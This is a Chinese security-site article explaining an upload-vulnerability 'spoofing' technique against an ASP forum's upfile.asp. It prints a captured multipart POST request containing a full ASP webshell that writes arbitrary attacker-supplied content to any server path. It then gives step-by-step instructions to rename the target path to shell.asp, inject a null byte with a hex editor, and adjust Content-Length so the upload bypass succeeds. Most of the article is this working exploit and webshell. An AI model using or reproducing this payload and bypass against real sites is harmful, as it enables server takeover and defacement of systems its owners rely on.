51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

解析上传漏洞欺骗技术

作者:佚名
安全 黑客攻防
先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来

实际上网络中存在着很多的漏洞,通过这些漏洞的利用黑客就可能会入侵网站的服务器,取得管理员权限。其中不少的程序都存在着上传漏洞,通过上传漏洞黑客入侵者便可以上传一个ASP木马,然后通过上传漏洞欺骗技术来达到自己入侵的目的。接下来本篇文章就讲分析一下上传漏洞欺骗的具体原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多没用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木马\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失败!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址来自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

传递的信息我们获取了,下面就来修改下达到上传漏洞欺骗目的。主要修改一下几点:

1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为'\0'这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

4.还有一个地方也要修改,就是这句Content-Length: 1792表示提交数据的字符个数。

如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。

【编辑推荐】

  1. 亲身体验MS07-029漏洞入侵
  2. 解析系统泄露密码入侵攻击
  3. 经典后门实例之线程插入后门
  4. 经典后门实例之扩展后门
  5. 通过数据库下载漏洞发起网络攻击

 

责任编辑:张启峰 来源: 安全在线
上传漏洞欺骗
相关推荐
实例解析Cookies欺骗原理
本文通过对6kbbs的网站进行Cookies欺骗为实例,向各位管理员和用户分析Cookies欺骗的原理和应用过程,使得管理员能够在日常网络安全维护中注意此种行为。

2010-09-13 16:24:39

深入解析ARP欺骗攻击
ARP(地址解析协议)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDIIP网络中使用。本文将为大家详细剖析ARP欺骗,它主要分为双向欺骗和单向欺骗。

2013-04-01 10:12:39

利用IP地址欺骗突破防火墙深层技术解析
一般的访问控制主要在防火墙中进行设置,制定一些安全策略:如内部局域网的资源不允许外部网上的用户使用;不设防区(又称非军事区)能为内部或外部局域网,其中的资源允许外部网的用户有限度地使用;能使外部用户访问非军事区(DMZ区)的WEB服务器等等。看本文以下的的详细分析。

2011-04-18 13:33:07

无ARP欺骗嗅探技术
ARP欺骗的攻击和防御技术都比较成熟了,这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理,实际的攻击方法是进行MAC欺骗。

2009-12-17 10:14:14

Microsoft WINS之域控制器欺骗漏洞
本文介绍了微软系统中受影响的系统出现域控制器欺骗漏洞进行测试的方法。

2011-07-13 13:43:30

浏览器地址栏欺骗漏洞背后
最近几个不同的Web浏览器出现地址栏欺骗漏洞。这些漏洞背后的问题是什么

2015-12-01 10:43:55

ICMP/ARP协议解析及ARP欺骗
ICMP是TCPIP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。

2019-10-31 08:43:43

ICMPARP协议ARP欺骗
PHP漏洞全解(九)-文件上传漏洞
本文主要介绍针对PHP网站文件上传漏洞。由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本,即文件上传漏洞。

2012-04-12 16:05:50

无ARP欺骗的嗅探技术
ARP欺骗的攻击和防御技术都比较成熟了,这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理,实际的攻击方法是进行MAC欺骗。

2009-07-15 20:44:17

深入解析ARP欺骗攻击防护之ARP
本文在介绍ARP欺骗攻击防护之前首先向大家了ARP的基本信息,以便大家查阅,帮助大家理解ARP。

2011-04-06 10:23:46

解析漏洞总结
IIS6.0解析利用方法有两种,目录解析和文件解析。

2013-09-04 10:41:08

关于Firefox浏览器JavaScript提示欺骗漏洞通知
天融信公司攻防实验室再次挖掘出MozillaFirefox浏览器中存在的两个严重的JavaScriptPromptSpoofing安全漏洞,远程攻击者可以通过构造欺骗信息获取用户敏感数据。据悉,此次天融信公司发现的安全漏洞影响几乎所有版本的Firefox浏览器,建议用户密切关注Firefox相关漏洞补丁,杜绝安全隐患。

2009-12-28 12:16:54

实例解析通过流量检测查找ARP欺骗
笔者的工作单位是一所学校,最近学校的一栋教学楼内的网络突然出现时断时好的现象,这可是严重影响了学校的正常教学和工作,情况危急,需要马上解决!

2010-09-16 16:06:37

DLL劫持漏洞解析
DLL劫持漏洞是通过一些手段来劫持或者替换正常的DLL,欺骗正常程序加载预先准备好的恶意DLL的一类漏洞的统称。利用DLL劫持漏洞,病毒木马可以随着文档的打开(或者其他一些程序正常行为)而激活自身,进而获得系统的控制权。

2013-06-25 10:11:18

Cookie欺骗 腾讯拍拍秒杀活动的验证码漏洞
有谁还记得大概几年前突然出现了验证码这东西,许多网站甚至桌面应用程序都陆续实现了验证码技术,主要作用无非就是防止用户利用程序进行自动提交,避免暴力破解,避免服务器遭受恶意攻击。

2010-12-05 19:36:32

面部识别:攻击类型和反欺骗技术
多亏了计算机科学和电子技术的迅速发展,如今,就市场份额而言,面部识别正成为仅次于指纹的全球第二大生物特征认证方法。

2020-11-08 16:00:33

人脸识别技术安全
利用欺骗技术降低物联网安全风险
随着越来越多的公司开发从门铃和安全摄像头到冰箱和恒温器等连网设备,那么,网络犯罪分子发现新的漏洞并开发利用它们的新方法也就不令人意外了。

2018-12-18 09:20:44

欺骗技术物联网安全物联网
深入解析ARP欺骗攻击防护之根本防护
本文主要向大家介绍了ARP欺骗攻击防护的根本防护,希望大家多多掌握。

2011-04-06 10:36:21

解析中间人攻击之四——SSL欺骗
在本文中,我们将研究SSL欺骗,这也是最厉害的中间人攻击方式,因为SSL欺骗可以通过利用人们信赖的服务来发动攻击。首先我们先讨论SSL连接的理论及其安全性问题,然后看看SSL连接如何被利用来发动攻击,最后与大家分享关于SSL欺骗的检测以及防御技巧。

2010-06-13 12:06:41

两大IIS解析漏洞解析
本文向大家介绍了两种漏洞,深刻的解释了IIS解析漏洞这个概念,也希望读者能通过本文了解IIS解析漏洞。

2011-07-01 10:42:51

IIS解析漏洞
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服